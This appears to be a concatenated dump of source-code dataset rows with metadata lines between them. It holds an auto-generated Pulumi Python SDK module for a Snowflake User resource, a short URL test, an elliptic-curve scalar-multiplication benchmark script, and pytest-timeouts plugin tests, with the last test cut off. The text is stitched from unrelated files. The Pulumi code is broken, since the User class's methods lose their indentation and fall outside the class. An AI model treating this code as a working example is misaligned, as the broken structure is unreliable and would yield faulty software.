        return pulumi.get(self, "last_name")

    @last_name.setter
    def last_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "last_name", value)

    @property
    @pulumi.getter(name="loginName")
    def login_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name users use to log in. If not supplied, snowflake will use name instead.
        """
        return pulumi.get(self, "login_name")

    @login_name.setter
    def login_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "login_name", value)

    @property
    @pulumi.getter(name="mustChangePassword")
    def must_change_password(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies whether the user is forced to change their password on next login (including their first/initial login) into the system.
        """
        return pulumi.get(self, "must_change_password")

    @must_change_password.setter
    def must_change_password(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "must_change_password", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the user. Note that if you do not supply login_name this will be used as login_name. [doc](https://docs.snowflake.net/manuals/sql-reference/sql/create-user.html#required-parameters)
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        **WARNING:** this will put the password in the terraform state file. Use carefully.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="rsaPublicKey")
    def rsa_public_key(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the user’s RSA public key; used for key-pair authentication. Must be on 1 line without header and trailer.
        """
        return pulumi.get(self, "rsa_public_key")

    @rsa_public_key.setter
    def rsa_public_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "rsa_public_key", value)

    @property
    @pulumi.getter(name="rsaPublicKey2")
    def rsa_public_key2(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the user’s second RSA public key; used to rotate the public and private keys for key-pair authentication based on an expiration schedule set by your organization. Must be on 1 line without header and trailer.
        """
        return pulumi.get(self, "rsa_public_key2")

    @rsa_public_key2.setter
    def rsa_public_key2(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "rsa_public_key2", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['UserTagArgs']]]]:
        """
        Definitions of a tag to associate with the resource.
        """
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['UserTagArgs']]]]):
        pulumi.set(self, "tags", value)
class User(pulumi.CustomResource):
@overload
def __init__(__self__,
             resource_name: str,
             opts: Optional[pulumi.ResourceOptions] = None,
             comment: Optional[pulumi.Input[str]] = None,
             default_namespace: Optional[pulumi.Input[str]] = None,
             default_role: Optional[pulumi.Input[str]] = None,
             default_warehouse: Optional[pulumi.Input[str]] = None,
             disabled: Optional[pulumi.Input[bool]] = None,
             display_name: Optional[pulumi.Input[str]] = None,
             email: Optional[pulumi.Input[str]] = None,
             first_name: Optional[pulumi.Input[str]] = None,
             last_name: Optional[pulumi.Input[str]] = None,
             login_name: Optional[pulumi.Input[str]] = None,
             must_change_password: Optional[pulumi.Input[bool]] = None,
             name: Optional[pulumi.Input[str]] = None,
             password: Optional[pulumi.Input[str]] = None,
             rsa_public_key: Optional[pulumi.Input[str]] = None,
             rsa_public_key2: Optional[pulumi.Input[str]] = None,
             tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['UserTagArgs']]]]] = None,
             __props__=None):
    """
    Construct a User resource from individual keyword arguments.

    ## Example Usage
    ```python
    import pulumi
    import pulumi_snowflake as snowflake
    user = snowflake.User("user",
        comment="A user of snowflake.",
        default_role="role1",
        default_warehouse="warehouse",
        disabled=False,
        display_name="Snowflake User",
        email="user@snowflake.example",
        first_name="Snowflake",
        last_name="User",
        login_name="snowflake_user",
        must_change_password=False,
        password="secret",
        rsa_public_key="...",
        rsa_public_key2="...")
    ```
    ## Import
    ```sh
    $ pulumi import snowflake:index/user:User example userName
    ```
    :param str resource_name: The name of the resource.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[str] default_namespace: Specifies the namespace (database only or database and schema) that is active by default for the user’s session upon login.
    :param pulumi.Input[str] default_role: Specifies the role that is active by default for the user’s session upon login.
    :param pulumi.Input[str] default_warehouse: Specifies the virtual warehouse that is active by default for the user’s session upon login.
    :param pulumi.Input[str] display_name: Name displayed for the user in the Snowflake web interface.
    :param pulumi.Input[str] email: Email address for the user.
    :param pulumi.Input[str] first_name: First name of the user.
    :param pulumi.Input[str] last_name: Last name of the user.
    :param pulumi.Input[str] login_name: The name users use to log in. If not supplied, snowflake will use name instead.
    :param pulumi.Input[bool] must_change_password: Specifies whether the user is forced to change their password on next login (including their first/initial login) into the system.
    :param pulumi.Input[str] name: Name of the user. Note that if you do not supply login_name this will be used as login_name. [doc](https://docs.snowflake.net/manuals/sql-reference/sql/create-user.html#required-parameters)
    :param pulumi.Input[str] password: **WARNING:** this will put the password in the terraform state file. Use carefully.
    :param pulumi.Input[str] rsa_public_key: Specifies the user’s RSA public key; used for key-pair authentication. Must be on 1 line without header and trailer.
    :param pulumi.Input[str] rsa_public_key2: Specifies the user’s second RSA public key; used to rotate the public and private keys for key-pair authentication based on an expiration schedule set by your organization. Must be on 1 line without header and trailer.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['UserTagArgs']]]] tags: Definitions of a tag to associate with the resource.
    """
    ...
@overload
def __init__(__self__,
             resource_name: str,
             args: Optional[UserArgs] = None,
             opts: Optional[pulumi.ResourceOptions] = None):
    """
    Construct a User resource from a pre-built :class:`UserArgs` bundle.

    ## Example Usage
    ```python
    import pulumi
    import pulumi_snowflake as snowflake
    user = snowflake.User("user",
        comment="A user of snowflake.",
        default_role="role1",
        default_warehouse="warehouse",
        disabled=False,
        display_name="Snowflake User",
        email="user@snowflake.example",
        first_name="Snowflake",
        last_name="User",
        login_name="snowflake_user",
        must_change_password=False,
        password="secret",
        rsa_public_key="...",
        rsa_public_key2="...")
    ```
    ## Import
    ```sh
    $ pulumi import snowflake:index/user:User example userName
    ```
    :param str resource_name: The name of the resource.
    :param UserArgs args: The arguments to use to populate this resource's properties.
    :param pulumi.ResourceOptions opts: Options for the resource.
    """
    ...
def __init__(__self__, resource_name: str, *args, **kwargs):
    """Dispatch construction to ``_internal_init``.

    Accepts either a ``UserArgs`` bundle (plus options) or plain keyword
    arguments, matching the two ``@overload`` signatures above.
    """
    resource_args, opts = _utilities.get_resource_args_opts(
        UserArgs, pulumi.ResourceOptions, *args, **kwargs)
    if resource_args is None:
        # Keyword-argument form: forward everything untouched.
        __self__._internal_init(resource_name, *args, **kwargs)
    else:
        # Bundle form: expand the UserArgs fields into keyword arguments.
        __self__._internal_init(resource_name, opts, **resource_args.__dict__)
def _internal_init(__self__,
                   resource_name: str,
                   opts: Optional[pulumi.ResourceOptions] = None,
                   comment: Optional[pulumi.Input[str]] = None,
                   default_namespace: Optional[pulumi.Input[str]] = None,
                   default_role: Optional[pulumi.Input[str]] = None,
                   default_warehouse: Optional[pulumi.Input[str]] = None,
                   disabled: Optional[pulumi.Input[bool]] = None,
                   display_name: Optional[pulumi.Input[str]] = None,
                   email: Optional[pulumi.Input[str]] = None,
                   first_name: Optional[pulumi.Input[str]] = None,
                   last_name: Optional[pulumi.Input[str]] = None,
                   login_name: Optional[pulumi.Input[str]] = None,
                   must_change_password: Optional[pulumi.Input[bool]] = None,
                   name: Optional[pulumi.Input[str]] = None,
                   password: Optional[pulumi.Input[str]] = None,
                   rsa_public_key: Optional[pulumi.Input[str]] = None,
                   rsa_public_key2: Optional[pulumi.Input[str]] = None,
                   tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['UserTagArgs']]]]] = None,
                   __props__=None):
    # Shared implementation behind both __init__ overloads: validates
    # options, builds the property bag, and registers the resource.
    if opts is None:
        opts = pulumi.ResourceOptions()
    if not isinstance(opts, pulumi.ResourceOptions):
        raise TypeError('Expected resource options to be a ResourceOptions instance')
    if opts.version is None:
        # Default to the provider version bundled with this SDK.
        opts.version = _utilities.get_version()
    if opts.id is None:
        # No id => creating a new resource: populate the inputs.
        if __props__ is not None:
            raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
        __props__ = UserArgs.__new__(UserArgs)
        __props__.__dict__["comment"] = comment
        __props__.__dict__["default_namespace"] = default_namespace
        __props__.__dict__["default_role"] = default_role
        __props__.__dict__["default_warehouse"] = default_warehouse
        __props__.__dict__["disabled"] = disabled
        __props__.__dict__["display_name"] = display_name
        __props__.__dict__["email"] = email
        __props__.__dict__["first_name"] = first_name
        __props__.__dict__["last_name"] = last_name
        __props__.__dict__["login_name"] = login_name
        __props__.__dict__["must_change_password"] = must_change_password
        __props__.__dict__["name"] = name
        __props__.__dict__["password"] = password
        __props__.__dict__["rsa_public_key"] = rsa_public_key
        __props__.__dict__["rsa_public_key2"] = rsa_public_key2
        __props__.__dict__["tags"] = tags
        # Output-only property: the provider computes it after creation.
        __props__.__dict__["has_rsa_public_key"] = None
    super(User, __self__).__init__(
        'snowflake:index/user:User',
        resource_name,
        __props__,
        opts)
@staticmethod
def get(resource_name: str,
        id: pulumi.Input[str],
        opts: Optional[pulumi.ResourceOptions] = None,
        comment: Optional[pulumi.Input[str]] = None,
        default_namespace: Optional[pulumi.Input[str]] = None,
        default_role: Optional[pulumi.Input[str]] = None,
        default_warehouse: Optional[pulumi.Input[str]] = None,
        disabled: Optional[pulumi.Input[bool]] = None,
        display_name: Optional[pulumi.Input[str]] = None,
        email: Optional[pulumi.Input[str]] = None,
        first_name: Optional[pulumi.Input[str]] = None,
        has_rsa_public_key: Optional[pulumi.Input[bool]] = None,
        last_name: Optional[pulumi.Input[str]] = None,
        login_name: Optional[pulumi.Input[str]] = None,
        must_change_password: Optional[pulumi.Input[bool]] = None,
        name: Optional[pulumi.Input[str]] = None,
        password: Optional[pulumi.Input[str]] = None,
        rsa_public_key: Optional[pulumi.Input[str]] = None,
        rsa_public_key2: Optional[pulumi.Input[str]] = None,
        tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['UserTagArgs']]]]] = None) -> 'User':
    """
    Get an existing User resource's state with the given name, id, and optional extra
    properties used to qualify the lookup.
    :param str resource_name: The unique name of the resulting resource.
    :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[str] default_namespace: Specifies the namespace (database only or database and schema) that is active by default for the user’s session upon login.
    :param pulumi.Input[str] default_role: Specifies the role that is active by default for the user’s session upon login.
    :param pulumi.Input[str] default_warehouse: Specifies the virtual warehouse that is active by default for the user’s session upon login.
    :param pulumi.Input[str] display_name: Name displayed for the user in the Snowflake web interface.
    :param pulumi.Input[str] email: Email address for the user.
    :param pulumi.Input[str] first_name: First name of the user.
    :param pulumi.Input[bool] has_rsa_public_key: Will be true if user has an RSA key set.
    :param pulumi.Input[str] last_name: Last name of the user.
    :param pulumi.Input[str] login_name: The name users use to log in. If not supplied, snowflake will use name instead.
    :param pulumi.Input[bool] must_change_password: Specifies whether the user is forced to change their password on next login (including their first/initial login) into the system.
    :param pulumi.Input[str] name: Name of the user. Note that if you do not supply login_name this will be used as login_name. [doc](https://docs.snowflake.net/manuals/sql-reference/sql/create-user.html#required-parameters)
    :param pulumi.Input[str] password: **WARNING:** this will put the password in the terraform state file. Use carefully.
    :param pulumi.Input[str] rsa_public_key: Specifies the user’s RSA public key; used for key-pair authentication. Must be on 1 line without header and trailer.
    :param pulumi.Input[str] rsa_public_key2: Specifies the user’s second RSA public key; used to rotate the public and private keys for key-pair authentication based on an expiration schedule set by your organization. Must be on 1 line without header and trailer.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['UserTagArgs']]]] tags: Definitions of a tag to associate with the resource.
    """
    # Attach the provider id so the engine performs a lookup, not a create.
    opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
    # Build the state bag directly, bypassing _UserState.__init__.
    __props__ = _UserState.__new__(_UserState)
    __props__.__dict__["comment"] = comment
    __props__.__dict__["default_namespace"] = default_namespace
    __props__.__dict__["default_role"] = default_role
    __props__.__dict__["default_warehouse"] = default_warehouse
    __props__.__dict__["disabled"] = disabled
    __props__.__dict__["display_name"] = display_name
    __props__.__dict__["email"] = email
    __props__.__dict__["first_name"] = first_name
    __props__.__dict__["has_rsa_public_key"] = has_rsa_public_key
    __props__.__dict__["last_name"] = last_name
    __props__.__dict__["login_name"] = login_name
    __props__.__dict__["must_change_password"] = must_change_password
    __props__.__dict__["name"] = name
    __props__.__dict__["password"] = password
    __props__.__dict__["rsa_public_key"] = rsa_public_key
    __props__.__dict__["rsa_public_key2"] = rsa_public_key2
    __props__.__dict__["tags"] = tags
    return User(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def comment(self) -> pulumi.Output[Optional[str]]:
    """The resource's ``comment`` value, if set."""
    return pulumi.get(self, "comment")
@property
@pulumi.getter(name="defaultNamespace")
def default_namespace(self) -> pulumi.Output[Optional[str]]:
    """
    Specifies the namespace (database only or database and schema) that is active by default for the user’s session upon login.
    """
    return pulumi.get(self, "default_namespace")
@property
@pulumi.getter(name="defaultRole")
def default_role(self) -> pulumi.Output[str]:
    """
    Specifies the role that is active by default for the user’s session upon login.
    """
    # NOTE(review): declared as a non-Optional Output, unlike most siblings — confirm the provider always populates it.
    return pulumi.get(self, "default_role")
@property
@pulumi.getter(name="defaultWarehouse")
def default_warehouse(self) -> pulumi.Output[Optional[str]]:
    """
    Specifies the virtual warehouse that is active by default for the user’s session upon login.
    """
    return pulumi.get(self, "default_warehouse")
@property
@pulumi.getter
def disabled(self) -> pulumi.Output[bool]:
    """The resource's ``disabled`` value."""
    return pulumi.get(self, "disabled")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
    """
    Name displayed for the user in the Snowflake web interface.
    """
    return pulumi.get(self, "display_name")
@property
@pulumi.getter
def email(self) -> pulumi.Output[Optional[str]]:
    """
    Email address for the user.
    """
    value = pulumi.get(self, "email")
    return value
@property
@pulumi.getter(name="firstName")
def first_name(self) -> pulumi.Output[Optional[str]]:
    """
    First name of the user.
    """
    value = pulumi.get(self, "first_name")
    return value
@property
@pulumi.getter(name="hasRsaPublicKey")
def has_rsa_public_key(self) -> pulumi.Output[bool]:
    """
    True if the user has an RSA public key set.
    """
    value = pulumi.get(self, "has_rsa_public_key")
    return value
@property
@pulumi.getter(name="lastName")
def last_name(self) -> pulumi.Output[Optional[str]]:
    """
    Last name of the user.
    """
    value = pulumi.get(self, "last_name")
    return value
@property
@pulumi.getter(name="loginName")
def login_name(self) -> pulumi.Output[str]:
    """
    The name users use to log in. If not supplied, Snowflake uses the
    user's name instead.
    """
    value = pulumi.get(self, "login_name")
    return value
@property
@pulumi.getter(name="mustChangePassword")
def must_change_password(self) -> pulumi.Output[Optional[bool]]:
    """
    Whether the user is forced to change their password on next login
    (including their first/initial login) into the system.
    """
    value = pulumi.get(self, "must_change_password")
    return value
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
    """
    Name of the user. Note that if you do not supply login_name, this is
    used as login_name.
    [doc](https://docs.snowflake.net/manuals/sql-reference/sql/create-user.html#required-parameters)
    """
    value = pulumi.get(self, "name")
    return value
@property
@pulumi.getter
def password(self) -> pulumi.Output[Optional[str]]:
    """
    **WARNING:** this will put the password in the terraform state file.
    Use carefully.
    """
    value = pulumi.get(self, "password")
    return value
@property
@pulumi.getter(name="rsaPublicKey")
def rsa_public_key(self) -> pulumi.Output[Optional[str]]:
    """
    The user's RSA public key, used for key-pair authentication. Must be
    on one line without header and trailer.
    """
    value = pulumi.get(self, "rsa_public_key")
    return value
@property
@pulumi.getter(name="rsaPublicKey2")
def rsa_public_key2(self) -> pulumi.Output[Optional[str]]:
    """
    The user's second RSA public key, used to rotate the public and
    private keys for key-pair authentication based on an expiration
    schedule set by your organization. Must be on one line without
    header and trailer.
    """
    value = pulumi.get(self, "rsa_public_key2")
    return value
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence['outputs.UserTag']]]:
    """
    Definitions of a tag to associate with the resource.
    """
    value = pulumi.get(self, "tags")
    return value
| 45.785479 | 268 | 0.650256 | 5,228 | 41,619 | 4.979151 | 0.043803 | 0.094234 | 0.089816 | 0.098882 | 0.941608 | 0.932504 | 0.91852 | 0.913104 | 0.90907 | 0.888287 | 0 | 0.001684 | 0.243975 | 41,619 | 908 | 269 | 45.835903 | 0.825616 | 0.331699 | 0 | 0.875926 | 1 | 0 | 0.091762 | 0.000969 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.092593 | 0.012963 | 0.011111 | 0.27963 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
c8d3f071ed1242736e47ce0a97bb4dde82926ef0 | 148 | py | Python | tests/web/test_urls.py | vyahello/weather-chatbot | 721229b106cdd35aee63ea690156b852c077e923 | [
"Apache-2.0"
] | null | null | null | tests/web/test_urls.py | vyahello/weather-chatbot | 721229b106cdd35aee63ea690156b852c077e923 | [
"Apache-2.0"
] | null | null | null | tests/web/test_urls.py | vyahello/weather-chatbot | 721229b106cdd35aee63ea690156b852c077e923 | [
"Apache-2.0"
] | 2 | 2019-10-30T16:47:08.000Z | 2020-01-01T18:45:46.000Z | from chat.web.urls import CommonUrl
def test_common_url() -> None:
assert CommonUrl("https://path/to/url").compose() == "https://path/to/url"
| 24.666667 | 78 | 0.689189 | 22 | 148 | 4.545455 | 0.727273 | 0.18 | 0.22 | 0.28 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121622 | 148 | 5 | 79 | 29.6 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0.256757 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
7407e78fb3933aaa0c1ece63da71dfd8c7895634 | 6,976 | py | Python | Code/PerformanceComparison/TestScripts/scalar_mul_tests.py | dev-alberto/Bachelor2017 | 1d3c44ff3b56a6030e08ef9d24920f83df1ae89e | [
"Apache-2.0"
] | null | null | null | Code/PerformanceComparison/TestScripts/scalar_mul_tests.py | dev-alberto/Bachelor2017 | 1d3c44ff3b56a6030e08ef9d24920f83df1ae89e | [
"Apache-2.0"
] | null | null | null | Code/PerformanceComparison/TestScripts/scalar_mul_tests.py | dev-alberto/Bachelor2017 | 1d3c44ff3b56a6030e08ef9d24920f83df1ae89e | [
"Apache-2.0"
] | null | null | null | from Code.DataStructures.PrimeCurves import P192, P384
from Code.PerformanceComparison.scalar_mul import ScalarMuliplicationPerformanceTest
scalar_mul_affine_test192 = ScalarMuliplicationPerformanceTest(1000, P192, [2**5, 2**32], 3)
scalar_mul_affine_test192Big = ScalarMuliplicationPerformanceTest(1000, P192, [2**128, 2**192], 3)
scalar_mul_jacobi_test192 = ScalarMuliplicationPerformanceTest(1000, P192, [2**5, 2**32], 3, jacobi=True)
scalar_mul_jacobi_test192Big_3 = ScalarMuliplicationPerformanceTest(1000, P192, [2**128, 2**192], 3, jacobi=True)
scalar_mul_jacobi_test192Big_4 = ScalarMuliplicationPerformanceTest(1000, P192, [2**128, 2**192], 4, jacobi=True)
scalar_mul_jacobi_test192Big_5 = ScalarMuliplicationPerformanceTest(1000, P192, [2**128, 2**192], 5, jacobi=True)
scalar_mul_jacobi_test192Big_7 = ScalarMuliplicationPerformanceTest(1000, P192, [2**128, 2**192], 7, jacobi=True)
scalar_mul_affine_test384 = ScalarMuliplicationPerformanceTest(1000, P384, [2**5, 2**32], 3)
scalar_mul_affine_test384Big = ScalarMuliplicationPerformanceTest(1000, P384, [2**330, 2**384], 3)
scalar_mul_jacobi_test384 = ScalarMuliplicationPerformanceTest(1000, P384, [2**5, 2**32], 3, jacobi=True)
scalar_mul_jacobi_test384Big_3 = ScalarMuliplicationPerformanceTest(1000, P384, [2**330, 2**384], 3, jacobi=True)
scalar_mul_jacobi_test384Big_4 = ScalarMuliplicationPerformanceTest(1000, P384, [2**330, 2**384], 4, jacobi=True)
scalar_mul_jacobi_test384Big_5 = ScalarMuliplicationPerformanceTest(1000, P384, [2**330, 2**384], 5, jacobi=True)
scalar_mul_jacobi_test384Big_7 = ScalarMuliplicationPerformanceTest(1000, P384, [2**330, 2**384], 7, jacobi=True)
print("SCALAR MUL")
print("*** 192 ***")
print("Binary algo")
print("Affine")
print(scalar_mul_affine_test192.binary_scalar_mul_test())
print(scalar_mul_affine_test192Big.binary_scalar_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test192.binary_scalar_mul_test())
print(scalar_mul_jacobi_test192Big_3.binary_scalar_mul_test())
print("left to right, signed")
print("Affine")
print(scalar_mul_affine_test192.left_to_right_scalar_mul_test())
print(scalar_mul_affine_test192Big.left_to_right_scalar_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test192.left_to_right_scalar_mul_test())
print(scalar_mul_jacobi_test192Big_3.left_to_right_scalar_mul_test())
print("right to left, signed")
print("Affine")
print(scalar_mul_affine_test192.right_to_left_scalar_mul_test())
print(scalar_mul_affine_test192Big.right_to_left_scalar_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test192.right_to_left_scalar_mul_test())
print(scalar_mul_jacobi_test192Big_3.right_to_left_scalar_mul_test())
print("window NAF")
print("Affine")
print(scalar_mul_affine_test192.window_naf_mul_test())
print(scalar_mul_affine_test192Big.window_naf_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test192.window_naf_mul_test())
print(scalar_mul_jacobi_test192Big_3.window_naf_mul_test())
print("Window tests, ignore for averages")
print(scalar_mul_jacobi_test192Big_3.window_naf_mul_test())
print(scalar_mul_jacobi_test192Big_4.window_naf_mul_test())
print(scalar_mul_jacobi_test192Big_5.window_naf_mul_test())
print("window NAF right to left")
print("Affine")
print(scalar_mul_affine_test192.right_to_left_scalar_mul_test())
print(scalar_mul_affine_test192Big.right_to_left_scalar_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test192.window_naf_right_to_left_test())
print(scalar_mul_jacobi_test192Big_3.window_naf_right_to_left_test())
print("Igonore for averages")
print(scalar_mul_jacobi_test192Big_3.window_naf_right_to_left_test())
print(scalar_mul_jacobi_test192Big_4.window_naf_right_to_left_test())
print(scalar_mul_jacobi_test192Big_5.window_naf_right_to_left_test())
print("sliding window")
print(scalar_mul_affine_test192.sliding_window_left_to_right_test())
print(scalar_mul_affine_test192Big.sliding_window_left_to_right_test())
print("Jacobi")
print(scalar_mul_jacobi_test192.sliding_window_left_to_right_test())
print(scalar_mul_jacobi_test192Big_7.sliding_window_left_to_right_test())
print("Ignore for averages")
print(scalar_mul_jacobi_test192Big_3.sliding_window_left_to_right_test())
print(scalar_mul_jacobi_test192Big_4.sliding_window_left_to_right_test())
print(scalar_mul_jacobi_test192Big_7.sliding_window_left_to_right_test())
print("****")
print("*** 384 ***")
print("Binary algo")
print("Affine")
print(scalar_mul_affine_test384.binary_scalar_mul_test())
print(scalar_mul_affine_test384Big.binary_scalar_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test384.binary_scalar_mul_test())
print(scalar_mul_jacobi_test384Big_3.binary_scalar_mul_test())
print("left to right, signed")
print("Affine")
print(scalar_mul_affine_test384.left_to_right_scalar_mul_test())
print(scalar_mul_affine_test384Big.left_to_right_scalar_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test384.left_to_right_scalar_mul_test())
print(scalar_mul_jacobi_test384Big_3.left_to_right_scalar_mul_test())
print("right to left, signed")
print("Affine")
print(scalar_mul_affine_test384.right_to_left_scalar_mul_test())
print(scalar_mul_affine_test384Big.right_to_left_scalar_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test384.right_to_left_scalar_mul_test())
print(scalar_mul_jacobi_test384Big_3.right_to_left_scalar_mul_test())
print("window NAF")
print("Affine")
print(scalar_mul_affine_test384.window_naf_mul_test())
print(scalar_mul_affine_test384Big.window_naf_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test384.window_naf_mul_test())
print(scalar_mul_jacobi_test384Big_3.window_naf_mul_test())
print("Window tests, ignore for averages")
print(scalar_mul_jacobi_test384Big_3.window_naf_mul_test())
print(scalar_mul_jacobi_test384Big_4.window_naf_mul_test())
print(scalar_mul_jacobi_test384Big_5.window_naf_mul_test())
print("window NAF right to left")
print("Affine")
print(scalar_mul_affine_test384.right_to_left_scalar_mul_test())
print(scalar_mul_affine_test384Big.right_to_left_scalar_mul_test())
print("Jacobi")
print(scalar_mul_jacobi_test384.window_naf_right_to_left_test())
print(scalar_mul_jacobi_test384Big_3.window_naf_right_to_left_test())
print("Igonore for averages")
print(scalar_mul_jacobi_test384Big_3.window_naf_right_to_left_test())
print(scalar_mul_jacobi_test384Big_4.window_naf_right_to_left_test())
print(scalar_mul_jacobi_test384Big_5.window_naf_right_to_left_test())
print("sliding window")
print(scalar_mul_affine_test384.sliding_window_left_to_right_test())
print(scalar_mul_affine_test384Big.sliding_window_left_to_right_test())
print("Jacobi")
print(scalar_mul_jacobi_test384.sliding_window_left_to_right_test())
print(scalar_mul_jacobi_test384Big_7.sliding_window_left_to_right_test())
print("Ignore for averages")
print(scalar_mul_jacobi_test384Big_3.sliding_window_left_to_right_test())
print(scalar_mul_jacobi_test384Big_4.sliding_window_left_to_right_test())
print(scalar_mul_jacobi_test384Big_7.sliding_window_left_to_right_test())
print("****")
| 45.894737 | 113 | 0.850631 | 1,053 | 6,976 | 5.098765 | 0.042735 | 0.184392 | 0.174707 | 0.156454 | 0.952133 | 0.950643 | 0.920097 | 0.843733 | 0.75731 | 0.644813 | 0 | 0.075183 | 0.042861 | 6,976 | 151 | 114 | 46.198676 | 0.72892 | 0 | 0 | 0.488189 | 0 | 0 | 0.074255 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.015748 | 0 | 0.015748 | 0.874016 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
cdc7985767797fe12ff8911ceeb86de978f14dbb | 8,657 | py | Python | test_pytest_timeouts.py | bigbZik/pytest-timeouts | 7db280b3e8f8663039130ccfcdc2eb455944a25f | [
"MIT"
] | 9 | 2018-07-11T20:39:10.000Z | 2021-12-30T20:49:02.000Z | test_pytest_timeouts.py | bigbZik/pytest-timeouts | 7db280b3e8f8663039130ccfcdc2eb455944a25f | [
"MIT"
] | 23 | 2018-06-30T12:15:11.000Z | 2019-12-30T19:42:34.000Z | test_pytest_timeouts.py | bigbZik/pytest-timeouts | 7db280b3e8f8663039130ccfcdc2eb455944a25f | [
"MIT"
] | 2 | 2018-06-28T09:47:21.000Z | 2019-09-16T20:52:41.000Z | pytest_plugins = 'pytester'
def test_arg_parse(testdir):
    """Timeouts given on the command line appear in pytest's report header."""
    testdir.makepyfile("""
def test_dummy(): pass
""")
    result = testdir.runpytest(
        '--setup-timeout=1.5',
        '--execution-timeout=2.5',
        '--teardown-timeout=3.5',
    )
    result.stdout.fnmatch_lines([
        "setup timeout: 1.5s, execution timeout: 2.5s, teardown timeout: 3.5s"
    ])
def test_ini_parse(testdir):
    """Timeouts configured in the ini file appear in pytest's report header."""
    testdir.makepyfile("""
def test_dummy(): pass
""")
    testdir.makeini("""
[pytest]
setup_timeout = 1.5
execution_timeout = 2.5
teardown_timeout = 3.5
""")
    result = testdir.runpytest()
    result.stdout.fnmatch_lines([
        "setup timeout: 1.5s, execution timeout: 2.5s, teardown timeout: 3.5s"
    ])
def test_setup_timeout(testdir):
    """Fixture setup sleeping past --setup-timeout fails the test."""
    testdir.makepyfile("""
import pytest
import time
@pytest.fixture(scope='function')
def fx():
    time.sleep(1)
    yield
def test_dummy(fx):
    pass
""")
    result = testdir.runpytest('--setup-timeout=0.5')
    result.stdout.fnmatch_lines([
        '*Failed: Timeout >0.5s*'
    ])
def test_execution_timeout(testdir):
    """A test body sleeping past --execution-timeout fails."""
    # NOTE(review): the generated fx2 fixture is never requested by
    # test_dummy, so only the test body's sleep is actually timed here.
    testdir.makepyfile("""
import pytest
import time
@pytest.fixture(scope='function')
def fx2():
    time.sleep(1)
    yield
def test_dummy():
    time.sleep(1)
""")
    result = testdir.runpytest('--execution-timeout=0.4')
    result.stdout.fnmatch_lines([
        '*Failed: Timeout >0.4s*'
    ])
def test_teardown_timeout(testdir):
    """Fixture teardown sleeping past --teardown-timeout fails the test."""
    testdir.makepyfile("""
import pytest
import time
@pytest.fixture(scope='function')
def fx():
    yield
    time.sleep(1)
def test_dummy(fx):
    pass
""")
    result = testdir.runpytest('--teardown-timeout=0.3')
    result.stdout.fnmatch_lines([
        '*Failed: Timeout >0.3s*'
    ])
def test_execucution_marker_timeout(testdir):
    """The execution_timeout marker limits the test body's run time."""
